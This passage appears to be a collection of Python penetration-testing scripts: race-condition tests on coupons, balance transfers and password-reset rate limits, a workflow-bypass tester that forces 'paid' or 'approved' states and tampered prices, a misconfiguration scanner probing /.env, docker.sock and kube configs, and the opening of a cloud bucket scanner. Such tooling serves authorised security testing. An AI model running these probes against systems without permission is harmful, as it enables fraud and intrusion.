            'method': 'POST',
            'url': f'{self.target_url}/api/purchase',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'product_id': product_id,
                'quantity': quantity,
                'customer_id': 'CUST_UNIQUE'
            }
        }
        print(f"[*] Testing inventory race for product: {product_id}")
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency * 2
        )

        successful_purchases = sum(1 for resp in responses if self._is_success(resp))

        result = {
            'test': 'inventory_race',
            'product_id': product_id,
            'quantity': quantity,
            'concurrency': concurrency,
            'successful_purchases': successful_purchases,
            'vulnerable': successful_purchases > 10  # Arbitrary threshold
        }
        self.results.append(result)
        return result

    async def test_rate_limit_bypass(self, endpoint, concurrency=50):
        """Compare sequential and concurrent success counts for ``endpoint``.

        Five requests are sent one at a time as a baseline, then
        ``concurrency`` requests at once. Flags the target when the burst
        produced more than twice as many 200 responses as the baseline.

        Returns:
            Result dict (also appended to ``self.results``).
        """
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}{endpoint}',
            'headers': {'Content-Type': 'application/json'},
            'json': {'action': 'test_UNIQUE'}
        }
        print(f"[*] Testing rate limit bypass: {endpoint}")

        # First, determine normal rate limit
        baseline_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=1,
            total_requests=5
        )
        # Then test with high concurrency
        attack_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )

        baseline_success = sum(1 for r in baseline_responses if self._is_success(r))
        attack_success = sum(1 for r in attack_responses if self._is_success(r))

        result = {
            'test': 'rate_limit_bypass',
            'endpoint': endpoint,
            'concurrency': concurrency,
            'baseline_success': baseline_success,
            'attack_success': attack_success,
            'vulnerable': attack_success > baseline_success * 2
        }
        self.results.append(result)
        return result

    async def run_all_tests(self):
        """Run the four tests concurrently with built-in sample arguments.

        Returns:
            dict with a ``summary`` (test count, number flagged vulnerable,
            test names) and ``detailed_results`` (the individual result
            dicts).
        """
        tests = [
            self.test_coupon_race("WELCOME2024", 20),
            self.test_balance_transfer_race("ACC123", "ACC456", 100, 15),
            self.test_inventory_race("PROD789", 1, 25),
            self.test_rate_limit_bypass("/api/reset-password", 50)
        ]
        results = await asyncio.gather(*tests)

        return {
            'summary': {
                'total_tests': len(results),
                'vulnerable_tests': sum(1 for r in results if r.get('vulnerable')),
                'tests_run': [r.get('test') for r in results]
            },
            'detailed_results': results
        }
# Usage
async def main():
    """Run every race-condition test against the sample target and print a report."""
    tester = RaceConditionTester(
        "http://target.com",
        session_cookies={"SESSION": "your_session_id"}
    )
    report = await tester.run_all_tests()

    banner = "=" * 60
    print("\n" + banner)
    print("RACE CONDITION TEST REPORT")
    print(banner)

    for entry in report['detailed_results']:
        verdict = "VULNERABLE" if entry.get('vulnerable') else "SAFE"
        print(f"\n[{verdict}] {entry['test']}")
        print(f" Details: {entry}")
# Run the test
import asyncio
asyncio.run(main())

#!/usr/bin/env python3
"""
Workflow Bypass and State Transition Testing
Tests for skipped steps, unauthorized state changes, and business logic flaws
"""
import requests
import json
from urllib.parse import urljoin
class WorkflowBypassTester:
    """Probe multi-step workflows for skipped steps and business-logic flaws.

    All requests go through one ``requests.Session`` (optionally carrying a
    bearer token). Each ``test_*`` method returns a list of finding dicts
    that always contain a ``type`` key. Results are status-code and
    substring heuristics and need manual confirmation.

    ``complete_step``, ``discover_state_parameters`` and ``start_workflow``
    are generic default hooks; override them for a specific application.
    """

    def __init__(self, base_url, auth_token=None):
        """
        Args:
            base_url: Base URL that endpoint paths are joined onto.
            auth_token: Optional token sent as ``Authorization: Bearer``.
        """
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        # Common workflow patterns: workflow name -> ordered step/state names.
        self.workflow_patterns = {
            'checkout': ['cart', 'shipping', 'payment', 'confirmation'],
            'registration': ['start', 'verify_email', 'set_password', 'complete'],
            'password_reset': ['request', 'verify_token', 'set_new', 'complete'],
            'kyc': ['personal_info', 'document_upload', 'verification', 'approved']
        }

    def test_step_skipping(self, workflow_type, steps):
        """Check whether later workflow steps are reachable without earlier ones.

        Args:
            workflow_type: Workflow name used to discover endpoints.
            steps: Currently unused; endpoints come from
                :meth:`discover_workflow_endpoints`.

        Returns:
            Findings of type ``step_skipping`` and ``intermediate_step_skip``.
        """
        vulnerabilities = []
        step_endpoints = self.discover_workflow_endpoints(workflow_type)
        if not step_endpoints:
            print(f"[-] Could not discover endpoints for {workflow_type}")
            return vulnerabilities

        # Jump straight from the first discovered step to the last one.
        if len(step_endpoints) >= 3:
            first_step, last_step = step_endpoints[0], step_endpoints[-1]
            print(f"[*] Testing step skipping: {first_step} -> {last_step}")
            response = self.session.get(urljoin(self.base_url, last_step))
            # A 200 only counts if the body does not look like an error page.
            if response.status_code == 200 and not self.is_error_page(response.text):
                vulnerabilities.append({
                    'type': 'step_skipping',
                    'workflow': workflow_type,
                    'from_step': first_step,
                    'to_step': last_step,
                    'status_code': response.status_code,
                    'evidence': response.text[:200]
                })

        # Complete step A, then request every step at least two positions later.
        for i in range(len(step_endpoints) - 2):
            for j in range(i + 2, len(step_endpoints)):
                self.complete_step(step_endpoints[i])
                response = self.session.get(urljoin(self.base_url, step_endpoints[j]))
                if response.status_code == 200 and not self.is_error_page(response.text):
                    vulnerabilities.append({
                        'type': 'intermediate_step_skip',
                        'workflow': workflow_type,
                        'skipped_steps': step_endpoints[i+1:j],
                        'status_code': response.status_code
                    })
        return vulnerabilities

    def test_state_manipulation(self, workflow_type):
        """Try to force privileged states through the workflow's update endpoint.

        For every parameter from :meth:`discover_state_parameters`, posts
        each of ``approved``/``completed``/``verified``/``paid`` that is not
        among the parameter's normal values, then reads the status endpoint
        to see whether the value shows up.

        Returns:
            Findings of type ``state_manipulation``.
        """
        vulnerabilities = []
        state_params = self.discover_state_parameters(workflow_type)
        for param, values in state_params.items():
            for target_state in ['approved', 'completed', 'verified', 'paid']:
                if target_state in values:
                    continue  # a normal state for this parameter
                response = self.session.post(
                    urljoin(self.base_url, f'/api/{workflow_type}/update'),
                    json={param: target_state}
                )
                if response.status_code != 200:
                    continue
                # Verify state was actually changed
                check_response = self.session.get(
                    urljoin(self.base_url, f'/api/{workflow_type}/status')
                )
                if target_state in check_response.text:
                    vulnerabilities.append({
                        'type': 'state_manipulation',
                        'workflow': workflow_type,
                        'parameter': param,
                        'unauthorized_state': target_state,
                        'evidence': check_response.text[:200]
                    })
        return vulnerabilities

    def test_parallel_workflows(self):
        """Start two instances of each workflow and try to cross-reference them.

        Returns:
            Findings of type ``parallel_workflow_mixing`` for every workflow
            whose update endpoint answered 200 to the mixed payload.
        """
        vulnerabilities = []
        for workflow in ['checkout', 'kyc', 'registration']:
            instance1_id = self.start_workflow(workflow)
            instance2_id = self.start_workflow(workflow)
            if not (instance1_id and instance2_id):
                continue
            # Try to mix data between workflows
            mix_payload = {
                'workflow_id': instance1_id,
                'data': {'from_instance': instance2_id}
            }
            response = self.session.post(
                urljoin(self.base_url, f'/api/{workflow}/update'),
                json=mix_payload
            )
            if response.status_code == 200:
                vulnerabilities.append({
                    'type': 'parallel_workflow_mixing',
                    'workflow': workflow,
                    'instance1': instance1_id,
                    'instance2': instance2_id,
                    'evidence': response.text[:200]
                })
        return vulnerabilities

    def test_business_constraint_bypass(self):
        """Submit invalid quantities, tampered prices and stacked coupons.

        Returns:
            Findings of type ``quantity_constraint_bypass``,
            ``price_manipulation`` and ``discount_stacking``.
        """
        vulnerabilities = []

        # Test 1: quantities that should be rejected
        test_cases = [
            {'item': 'PROD001', 'quantity': -1, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 0, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 999999, 'expected': 'error'},  # Too large
            {'item': 'PROD001', 'quantity': 1.5, 'expected': 'error'},  # Fractional
        ]
        for test in test_cases:
            # 'expected' is bookkeeping for this tester, not part of the request.
            payload = {key: value for key, value in test.items() if key != 'expected'}
            response = self.session.post(
                urljoin(self.base_url, '/api/cart/add'),
                json=payload
            )
            if response.status_code == 200 and test['expected'] == 'error':
                vulnerabilities.append({
                    'type': 'quantity_constraint_bypass',
                    'test_case': test,
                    'status_code': response.status_code,
                    'response': response.text[:200]
                })

        # Test 2: Price manipulation
        price_tests = [
            {'item': 'PROD001', 'price': 0.01},  # Lower than actual
            {'item': 'PROD001', 'price': -10},  # Negative price
            {'item': 'PROD001', 'price': 1e10},  # Very high price
        ]
        for test in price_tests:
            response = self.session.post(
                urljoin(self.base_url, '/api/checkout'),
                json=test
            )
            if response.status_code != 200:
                continue
            # Check if order was created with manipulated price
            order_response = self.session.get(
                urljoin(self.base_url, '/api/orders/latest')
            )
            if str(test['price']) in order_response.text:
                vulnerabilities.append({
                    'type': 'price_manipulation',
                    'test_case': test,
                    'order_details': order_response.text[:200]
                })

        # Test 3: Discount stacking
        discount_tests = [
            {'coupons': ['SAVE10', 'SAVE20', 'SAVE30']},  # Multiple coupons
            {'coupons': ['SAVE10'] * 5},  # Same coupon multiple times
        ]
        for test in discount_tests:
            for coupon in test['coupons']:
                self.session.post(
                    urljoin(self.base_url, '/api/apply-coupon'),
                    json={'coupon': coupon}
                )
            response = self.session.get(
                urljoin(self.base_url, '/api/cart/total')
            )
            try:
                total = json.loads(response.text).get('total', 0)
                negative_total = total < 0
            except (ValueError, AttributeError, TypeError):
                # Body is not a JSON object with a numeric total: nothing to judge.
                continue
            if negative_total:
                vulnerabilities.append({
                    'type': 'discount_stacking',
                    'coupons': test['coupons'],
                    'final_total': total
                })
        return vulnerabilities

    def discover_workflow_endpoints(self, workflow_type):
        """Return the candidate step endpoints that do not answer 404 to HEAD.

        Endpoints are returned in probe order (URL prefix first, then the
        step-name sequence from ``start`` to ``finish``) so that callers can
        treat the first and last entries as the first and last steps.
        """
        prefixes = ['/api', '', '/app']
        step_names = ['start', 'create', 'step1', 'step2', 'step3',
                      'review', 'confirm', 'complete', 'finish']
        endpoints = []
        for prefix in prefixes:
            for step in step_names:
                endpoint = f'{prefix}/{workflow_type}/{step}'
                response = self.session.head(urljoin(self.base_url, endpoint))
                if response.status_code != 404:
                    endpoints.append(endpoint)
        # De-duplicate without sorting: alphabetical order would put
        # 'complete' before 'start' and scramble the workflow sequence.
        return list(dict.fromkeys(endpoints))

    def discover_state_parameters(self, workflow_type):
        """Return candidate state parameters mapped to their normal values.

        Default hook: offers the parameter names ``status`` and ``state``,
        each mapped to the step names listed for ``workflow_type`` in
        ``self.workflow_patterns`` (empty for unknown workflows). The
        parameter names are generic guesses; override for a real target.
        """
        known_states = list(self.workflow_patterns.get(workflow_type, []))
        return {'status': known_states, 'state': list(known_states)}

    def complete_step(self, step_endpoint):
        """Submit an empty JSON POST to ``step_endpoint``.

        Default hook: real applications usually need step-specific form
        data, so override this for meaningful results.

        Returns:
            True when the response status is below 400.
        """
        response = self.session.post(urljoin(self.base_url, step_endpoint), json={})
        return response.status_code < 400

    def start_workflow(self, workflow):
        """Start a workflow instance and return its identifier.

        Default hook: posts an empty JSON body to ``/api/{workflow}/start``
        (an assumed endpoint, mirroring the ``/update`` and ``/status``
        paths used elsewhere in this class) and reads ``workflow_id`` or
        ``id`` from a JSON object response.

        Returns:
            The identifier, or None when the request did not succeed or no
            identifier could be read.
        """
        response = self.session.post(
            urljoin(self.base_url, f'/api/{workflow}/start'),
            json={}
        )
        if response.status_code not in (200, 201):
            return None
        try:
            body = json.loads(response.text)
        except ValueError:
            return None
        if not isinstance(body, dict):
            return None
        return body.get('workflow_id') or body.get('id')

    def is_error_page(self, html):
        """Return True if ``html`` contains any common error keyword (case-insensitive)."""
        error_indicators = [
            'error', 'invalid', 'not found', '404', '403',
            'forbidden', 'unauthorized', 'access denied'
        ]
        html_lower = html.lower()
        return any(indicator in html_lower for indicator in error_indicators)
# Usage: run every workflow test against a sample target and list the findings.
tester = WorkflowBypassTester(
    "http://target.com",
    auth_token="your_auth_token"
)
# Run tests
step_skip_vulns = tester.test_step_skipping('checkout', [])
state_vulns = tester.test_state_manipulation('kyc')
parallel_vulns = tester.test_parallel_workflows()
constraint_vulns = tester.test_business_constraint_bypass()
all_vulns = step_skip_vulns + state_vulns + parallel_vulns + constraint_vulns
print(f"\n[+] Found {len(all_vulns)} workflow bypass vulnerabilities:")
for vuln in all_vulns:
    print(f" - {vuln['type']}: {vuln.get('evidence', 'No details')[:100]}")

#!/usr/bin/env python3
"""
Advanced Security Misconfiguration Scanner
Covers web servers, application frameworks, cloud services, and containers
"""
import requests
import yaml
import json
import socket
import ssl
from typing import Dict, List
import concurrent.futures
class SecurityMisconfigScanner:
    """Probe one base URL for common web, framework, cloud and container misconfigurations.

    Each ``scan_*`` method returns a list of finding dicts with the keys
    ``category``, ``issue``, ``severity`` and ``evidence``.
    :meth:`run_comprehensive_scan` runs them all and summarises the result.
    Findings are status-code and substring heuristics, so expect false
    positives (for example on sites that answer 200 for unknown paths).
    """

    # Seconds allowed for any single HTTP request.
    REQUEST_TIMEOUT = 5

    # Only verbs that can modify or reflect state are probed and reported;
    # GET, POST and OPTIONS are served by practically every site.
    RISKY_METHODS = ('PUT', 'DELETE', 'PATCH', 'TRACE', 'CONNECT')

    def __init__(self, target_url):
        """
        Args:
            target_url: Base URL of the application to scan.
        """
        self.target_url = target_url
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'SecurityScanner/1.0'
        })
        self.findings = []

    @staticmethod
    def _finding(category, issue, severity, evidence):
        """Build one finding dict."""
        return {
            'category': category,
            'issue': issue,
            'severity': severity,
            'evidence': evidence
        }

    def _url(self, path):
        """Join ``path`` (starting with '/') onto the target URL."""
        return self.target_url.rstrip('/') + path

    def _get(self, url):
        """GET ``url``; return the response, or None if the request failed."""
        try:
            return self.session.get(url, timeout=self.REQUEST_TIMEOUT)
        except requests.RequestException:
            return None

    def scan_web_server(self):
        """Check risky HTTP methods, security headers, banners and directory listings.

        Raises:
            requests.RequestException: If the baseline GET of the target
                fails (the header checks cannot run without it).
        """
        server_findings = []

        # 1. Check HTTP methods
        for method in self.RISKY_METHODS:
            try:
                response = self.session.request(
                    method, self.target_url, timeout=self.REQUEST_TIMEOUT
                )
            except requests.RequestException:
                continue
            if response.status_code not in (405, 501):  # Method not allowed/implemented
                server_findings.append(self._finding(
                    'HTTP Methods',
                    f'Potentially dangerous method {method} enabled',
                    'MEDIUM',
                    f'HTTP {method} returns {response.status_code}'
                ))

        # 2. Check HTTP headers
        response = self.session.get(self.target_url, timeout=self.REQUEST_TIMEOUT)
        headers = response.headers
        security_headers = {
            'Strict-Transport-Security': 'HIGH',
            'Content-Security-Policy': 'MEDIUM',
            'X-Frame-Options': 'MEDIUM',
            'X-Content-Type-Options': 'LOW',
            'Referrer-Policy': 'LOW',
            'Permissions-Policy': 'MEDIUM'
        }
        for header, severity in security_headers.items():
            if header not in headers:
                server_findings.append(self._finding(
                    'Security Headers',
                    f'Missing security header: {header}',
                    severity,
                    'Header not present in response'
                ))

        # 3. Check for server information leakage
        server_header = headers.get('Server', '')
        x_powered_by = headers.get('X-Powered-By', '')
        if server_header:
            server_findings.append(self._finding(
                'Information Disclosure',
                f'Server version disclosed: {server_header}',
                'LOW',
                f'Server: {server_header}'
            ))
        if x_powered_by:
            server_findings.append(self._finding(
                'Information Disclosure',
                f'Technology stack disclosed: {x_powered_by}',
                'LOW',
                f'X-Powered-By: {x_powered_by}'
            ))

        # 4. Check for directory listing
        for directory in ['/static/', '/uploads/', '/images/', '/files/', '/assets/']:
            test_url = self._url(directory)
            response = self._get(test_url)
            if response is None:
                continue
            if '<title>Index of' in response.text or '<h1>Index of' in response.text:
                server_findings.append(self._finding(
                    'Directory Listing',
                    f'Directory listing enabled at {directory}',
                    'MEDIUM',
                    f'Directory index page accessible at {test_url}'
                ))
        return server_findings

    def scan_framework_config(self):
        """Run the checks specific to the framework reported by :meth:`detect_framework`.

        Only Django, Laravel and Rails have checks; other frameworks yield
        an empty list.
        """
        framework_findings = []
        framework = self.detect_framework()

        if framework == 'django':
            test_paths = [
                '/admin',  # Django admin
                '/admin/login',
                '/static/admin',
                '/debug',  # Django debug toolbar
            ]
            for path in test_paths:
                test_url = self._url(path)
                response = self._get(test_url)
                if response is None or response.status_code != 200:
                    continue
                if 'Django' not in response.text:
                    continue
                if path == '/admin':
                    framework_findings.append(self._finding(
                        'Django',
                        'Django admin interface accessible',
                        # No login form in the body suggests an open admin.
                        'HIGH' if 'login' not in response.text else 'MEDIUM',
                        f'Admin interface at {test_url}'
                    ))
                elif 'debug' in path:
                    framework_findings.append(self._finding(
                        'Django',
                        'Django debug mode might be enabled',
                        'HIGH',
                        f'Debug interface at {test_url}'
                    ))

        elif framework == 'laravel':
            test_paths = [
                '/.env',
                '/storage/logs/laravel.log',
                '/vendor/',
                '/config/',
            ]
            for path in test_paths:
                test_url = self._url(path)
                response = self._get(test_url)
                if response is None or response.status_code != 200:
                    continue
                if path == '/.env':
                    framework_findings.append(self._finding(
                        'Laravel',
                        '.env file accessible',
                        'CRITICAL',
                        f'Environment file exposed at {test_url}'
                    ))
                elif 'vendor' in path:
                    framework_findings.append(self._finding(
                        'Laravel',
                        'Vendor directory accessible',
                        'HIGH',
                        f'Vendor directory at {test_url}'
                    ))

        elif framework == 'rails':
            test_paths = [
                '/rails/info/properties',
                '/rails/mailers',
                '/assets/',
                '/system/',
            ]
            for path in test_paths:
                test_url = self._url(path)
                response = self._get(test_url)
                if response is None or response.status_code != 200:
                    continue
                if 'rails' in path:
                    framework_findings.append(self._finding(
                        'Rails',
                        'Rails information pages accessible',
                        'HIGH',
                        f'Rails info at {test_url}'
                    ))
        return framework_findings

    def scan_cloud_misconfig(self):
        """Look for cloud storage hostnames and credential-like tokens in the landing page.

        Raises:
            requests.RequestException: If the GET of the target fails.
        """
        import re  # local: this script's import block does not import re

        cloud_findings = []
        bucket_patterns = [
            's3.amazonaws.com',
            'storage.googleapis.com',
            'blob.core.windows.net',
            'digitaloceanspaces.com'
        ]
        response = self.session.get(self.target_url, timeout=self.REQUEST_TIMEOUT)
        html = response.text

        for pattern in bucket_patterns:
            if pattern in html:
                cloud_findings.append(self._finding(
                    'Cloud Storage',
                    f'Cloud storage URL found: {pattern}',
                    'MEDIUM',
                    f'Found reference to {pattern} in page source'
                ))

        # Token shapes matched: "AKIA" + 16 chars, or "gh?_" + 36 chars.
        cloud_keys = re.findall(r'(AKIA[0-9A-Z]{16})|(gh[oprstu]_[0-9a-zA-Z]{36})', html)
        if cloud_keys:
            cloud_findings.append(self._finding(
                'Cloud Credentials',
                'Potential cloud credentials found in page source',
                'CRITICAL',
                f'Found {len(cloud_keys)} potential credential patterns'
            ))
        return cloud_findings

    def scan_container_misconfig(self):
        """Check for exposed container/orchestration endpoints and config files."""
        container_findings = []

        # Kubernetes/Docker exposed endpoints
        container_endpoints = [
            '/docker.sock',
            '/var/run/docker.sock',
            '/kubelet',
            '/metrics',
            '/healthz',
            '/readyz',
            '/debug/pprof/',
            '/debug/vars',
            '/api/v1/namespaces',
            '/apis/apps/v1/deployments',
        ]
        indicators = ['docker', 'kubernetes', 'k8s', 'pod', 'container']
        for endpoint in container_endpoints:
            test_url = self._url(endpoint)
            response = self._get(test_url)
            if response is None or response.status_code != 200:
                continue
            # Require a container keyword in the body to cut down on noise.
            body = response.text.lower()
            if any(indicator in body for indicator in indicators):
                container_findings.append(self._finding(
                    'Container Exposure',
                    f'Container/orchestration endpoint exposed: {endpoint}',
                    'CRITICAL',
                    f'Endpoint accessible at {test_url}'
                ))

        # Check for Docker/K8s configuration files
        config_files = [
            '/.docker/config.json',
            '/.kube/config',
            '/etc/kubernetes/admin.conf',
            '/var/lib/kubelet/config.yaml'
        ]
        for config_file in config_files:
            test_url = self._url(config_file)
            response = self._get(test_url)
            if response is not None and response.status_code == 200:
                container_findings.append(self._finding(
                    'Container Config',
                    f'Container configuration file exposed: {config_file}',
                    'CRITICAL',
                    f'Config file accessible at {test_url}'
                ))
        return container_findings

    def scan_application_misconfig(self):
        """Check for debug endpoints, exposed config files and backup files."""
        app_findings = []

        # 1. Check for debug modes
        debug_indicators = [
            ('/debug', 'Debug interface'),
            ('/phpinfo', 'PHPInfo'),
            ('/actuator', 'Spring Boot Actuator'),
            ('/_debug', 'Debug endpoint'),
            ('/console', 'Debug console'),
        ]
        for endpoint, description in debug_indicators:
            test_url = self._url(endpoint)
            response = self._get(test_url)
            if response is not None and response.status_code == 200:
                app_findings.append(self._finding(
                    'Debug Mode',
                    f'{description} accessible',
                    'HIGH',
                    f'{description} at {test_url}'
                ))

        # 2. Check for configuration files
        config_files = [
            ('.env', 'Environment file'),
            ('.env.example', 'Example environment file'),
            ('config.xml', 'XML configuration'),
            ('config.json', 'JSON configuration'),
            ('settings.py', 'Python settings'),
            ('application.yml', 'YAML configuration'),
            ('web.config', 'ASP.NET config'),
            ('.htaccess', 'Apache config'),
            ('.git/config', 'Git config'),
        ]
        for filename, description in config_files:
            test_url = self._url('/' + filename)
            response = self._get(test_url)
            if response is not None and response.status_code == 200:
                app_findings.append(self._finding(
                    'Config File Exposure',
                    f'{description} exposed',
                    'MEDIUM' if 'example' in filename else 'HIGH',
                    f'{description} at {test_url}'
                ))

        # 3. Check for backup files
        backup_patterns = [
            '.bak', '.backup', '.old', '.orig', '.save',
            '_backup', '-backup', '.temp', '.tmp', '.swp'
        ]
        common_files = ['index', 'main', 'app', 'config', 'database', 'settings']
        for base_file in common_files:
            for ext in backup_patterns:
                test_url = self._url('/' + base_file + ext)
                response = self._get(test_url)
                if response is not None and response.status_code == 200:
                    app_findings.append(self._finding(
                        'Backup Files',
                        f'Backup file exposed: {base_file}{ext}',
                        'MEDIUM',
                        f'Backup file at {test_url}'
                    ))
        return app_findings

    def detect_framework(self):
        """Guess the framework from the landing page body and response headers.

        Returns:
            One of ``django``, ``laravel``, ``rails``, ``spring``,
            ``wordpress``, ``node``, ``aspnet`` or ``unknown``.

        Raises:
            requests.RequestException: If the GET of the target fails.
        """
        response = self.session.get(self.target_url, timeout=self.REQUEST_TIMEOUT)
        html = response.text
        html_lower = html.lower()
        server = response.headers.get('Server', '').lower()
        powered_by = response.headers.get('X-Powered-By', '').lower()

        if 'django' in html_lower or 'csrfmiddlewaretoken' in html:
            return 'django'
        if 'laravel' in html_lower or '/vendor/laravel/' in html:
            return 'laravel'
        if 'rails' in server or 'rails' in powered_by:
            return 'rails'
        if 'spring' in html_lower or 'spring' in server:
            return 'spring'
        if 'wordpress' in html_lower or '/wp-content/' in html:
            return 'wordpress'
        if 'node.js' in server or 'express' in server:
            return 'node'
        if '.net' in powered_by or 'asp.net' in server:
            return 'aspnet'
        return 'unknown'

    def run_comprehensive_scan(self):
        """Run all five scans on a thread pool and return the report.

        A scan that raises is reported on stdout and contributes no
        findings. Findings from any previous run are discarded first.
        """
        print(f"[*] Starting comprehensive misconfiguration scan for {self.target_url}")
        # Start clean so a repeated run does not duplicate earlier findings.
        self.findings = []
        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            futures = {
                executor.submit(self.scan_web_server): 'web_server',
                executor.submit(self.scan_framework_config): 'framework',
                executor.submit(self.scan_cloud_misconfig): 'cloud',
                executor.submit(self.scan_container_misconfig): 'container',
                executor.submit(self.scan_application_misconfig): 'application'
            }
            for future in concurrent.futures.as_completed(futures):
                scan_type = futures[future]
                try:
                    findings = future.result()
                    self.findings.extend(findings)
                    print(f"[+] {scan_type} scan completed: {len(findings)} findings")
                except Exception as e:
                    print(f"[-] {scan_type} scan failed: {e}")
        return self.generate_report()

    def generate_report(self):
        """Summarise ``self.findings`` into a report dict.

        Returns:
            dict with ``target``, ``scan_date`` (local time), ``total_findings``,
            ``findings_by_severity`` (counts for CRITICAL/HIGH/MEDIUM/LOW)
            and ``detailed_findings``.
        """
        import time  # local: this script's import block does not import time

        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        return {
            'target': self.target_url,
            'scan_date': time.strftime('%Y-%m-%d %H:%M:%S'),
            'total_findings': len(self.findings),
            'findings_by_severity': {
                severity: sum(1 for f in self.findings if f['severity'] == severity)
                for severity in severities
            },
            'detailed_findings': self.findings
        }
# Usage: scan a sample target and print a severity summary plus the first
# five critical findings.
scanner = SecurityMisconfigScanner("http://target.com")
report = scanner.run_comprehensive_scan()
print(f"\n{'='*60}")
print("SECURITY MISCONFIGURATION SCAN REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print("\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f" {severity}: {count}")
# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f['severity'] == 'CRITICAL']
if critical_findings:
    print("\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:  # Show first 5
        print(f" - {finding['issue']}")
        print(f" Evidence: {finding['evidence'][:100]}...")

#!/usr/bin/env python3
"""
Advanced Cloud Storage Misconfiguration Scanner
Covers AWS S3, Google Cloud Storage, Azure Blob Storage
"""
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
import google.cloud.storage
from google.cloud import storage
from azure.storage.blob import BlobServiceClient
import requests
import re
from typing import List, Dict
import json
class CloudStorageScanner:
def __init__(self, aws_profile=None, gcp_credentials=None, azure_connection_string=None):
self.aws_profile = aws_profile
self.gcp_credentials = gcp_credentials
self.azure_connection_string = azure_connection_string
self.findings = []
def scan_aws_s3(self):
    """Scan every S3 bucket visible to the configured AWS credentials.

    Uses ``self.aws_profile`` when set, otherwise boto3's default session.
    A failure while scanning one bucket is printed and the scan continues
    with the next bucket.

    Returns:
        List of finding dicts (``bucket``, ``issue``, ``severity``,
        ``details`` and sometimes ``url``/``public_url``/``statement``).
        Empty when credentials are missing or buckets cannot be listed.
    """
    s3_findings = []
    try:
        if self.aws_profile:
            session = boto3.Session(profile_name=self.aws_profile)
        else:
            session = boto3.Session()
        s3 = session.client('s3')
        buckets = s3.list_buckets()['Buckets']
    except NoCredentialsError:
        print("[-] No AWS credentials found")
        return s3_findings
    except Exception as e:
        print(f"[-] AWS S3 scan error: {e}")
        return s3_findings

    print(f"[*] Found {len(buckets)} S3 buckets")
    for bucket in buckets:
        bucket_name = bucket['Name']
        print(f"[*] Scanning bucket: {bucket_name}")
        try:
            s3_findings.extend(self._scan_s3_bucket(s3, session, bucket_name))
        except Exception as e:
            # Keep going: one broken bucket should not hide the others.
            print(f"[-] AWS S3 scan error: {e}")
    return s3_findings

def _scan_s3_bucket(self, s3, session, bucket_name):
    """Run all per-bucket checks for ``bucket_name`` and return its findings."""
    bucket_findings = []

    # 1. Check bucket policy
    try:
        policy = s3.get_bucket_policy(Bucket=bucket_name)
        bucket_findings.extend(
            self.analyze_bucket_policy(policy['Policy'], bucket_name)
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'NoSuchBucketPolicy':
            bucket_findings.append({
                'bucket': bucket_name,
                'issue': 'No bucket policy configured',
                'severity': 'MEDIUM',
                'details': 'Bucket has no policy, relying on ACLs'
            })
        else:
            # Same treatment as a failed ACL lookup below.
            bucket_findings.append({
                'bucket': bucket_name,
                'issue': 'Failed to retrieve bucket policy',
                'severity': 'MEDIUM',
                'details': str(e)
            })

    # 2. Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        bucket_findings.extend(
            self.analyze_bucket_acl(acl, bucket_name)
        )
    except ClientError as e:
        bucket_findings.append({
            'bucket': bucket_name,
            'issue': 'Failed to retrieve bucket ACL',
            'severity': 'MEDIUM',
            'details': str(e)
        })

    # 3. Check public access block
    try:
        public_access = s3.get_public_access_block(Bucket=bucket_name)
        bucket_findings.extend(
            self.analyze_public_access_block(public_access, bucket_name)
        )
    except ClientError as e:
        # A bucket without this configuration has no bucket-level guard
        # against public ACLs/policies, which is worth reporting.
        if e.response['Error']['Code'] == 'NoSuchPublicAccessBlockConfiguration':
            bucket_findings.append({
                'bucket': bucket_name,
                'issue': 'No public access block configured',
                'severity': 'MEDIUM',
                'details': 'Bucket has no PublicAccessBlock configuration'
            })

    # 4. Check for sensitive files
    try:
        paginator = s3.get_paginator('list_objects_v2')
        for page in paginator.paginate(Bucket=bucket_name):
            for obj in page.get('Contents', []):
                key = obj['Key']
                if self.is_sensitive_file(key):
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Sensitive file found in bucket',
                        'severity': 'HIGH',
                        'details': f'File: {key}',
                        'url': f'https://{bucket_name}.s3.amazonaws.com/{key}'
                    })
    except ClientError as e:
        bucket_findings.append({
            'bucket': bucket_name,
            'issue': 'Failed to list bucket contents',
            'severity': 'MEDIUM',
            'details': str(e)
        })

    # 5. Check bucket encryption (a successful call means it is configured)
    try:
        s3.get_bucket_encryption(Bucket=bucket_name)
    except ClientError as e:
        if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
            bucket_findings.append({
                'bucket': bucket_name,
                'issue': 'Server-side encryption not enabled',
                'severity': 'MEDIUM',
                'details': 'Bucket does not have default encryption configured'
            })

    # 6. Check for static website hosting (the call fails when it is off)
    try:
        s3.get_bucket_website(Bucket=bucket_name)
    except ClientError:
        pass
    else:
        bucket_findings.append({
            'bucket': bucket_name,
            'issue': 'Static website hosting enabled',
            'severity': 'LOW',
            'details': 'Bucket configured for static website hosting',
            # NOTE(review): uses the session's region, which may differ from
            # the bucket's own region - confirm before relying on this URL.
            'url': f'http://{bucket_name}.s3-website-{session.region_name}.amazonaws.com'
        })

    # 7. Test for public read access
    public_test = self.test_public_access(bucket_name)
    if public_test['is_public']:
        bucket_findings.append({
            'bucket': bucket_name,
            'issue': 'Bucket is publicly accessible',
            'severity': 'CRITICAL' if public_test['can_list'] else 'HIGH',
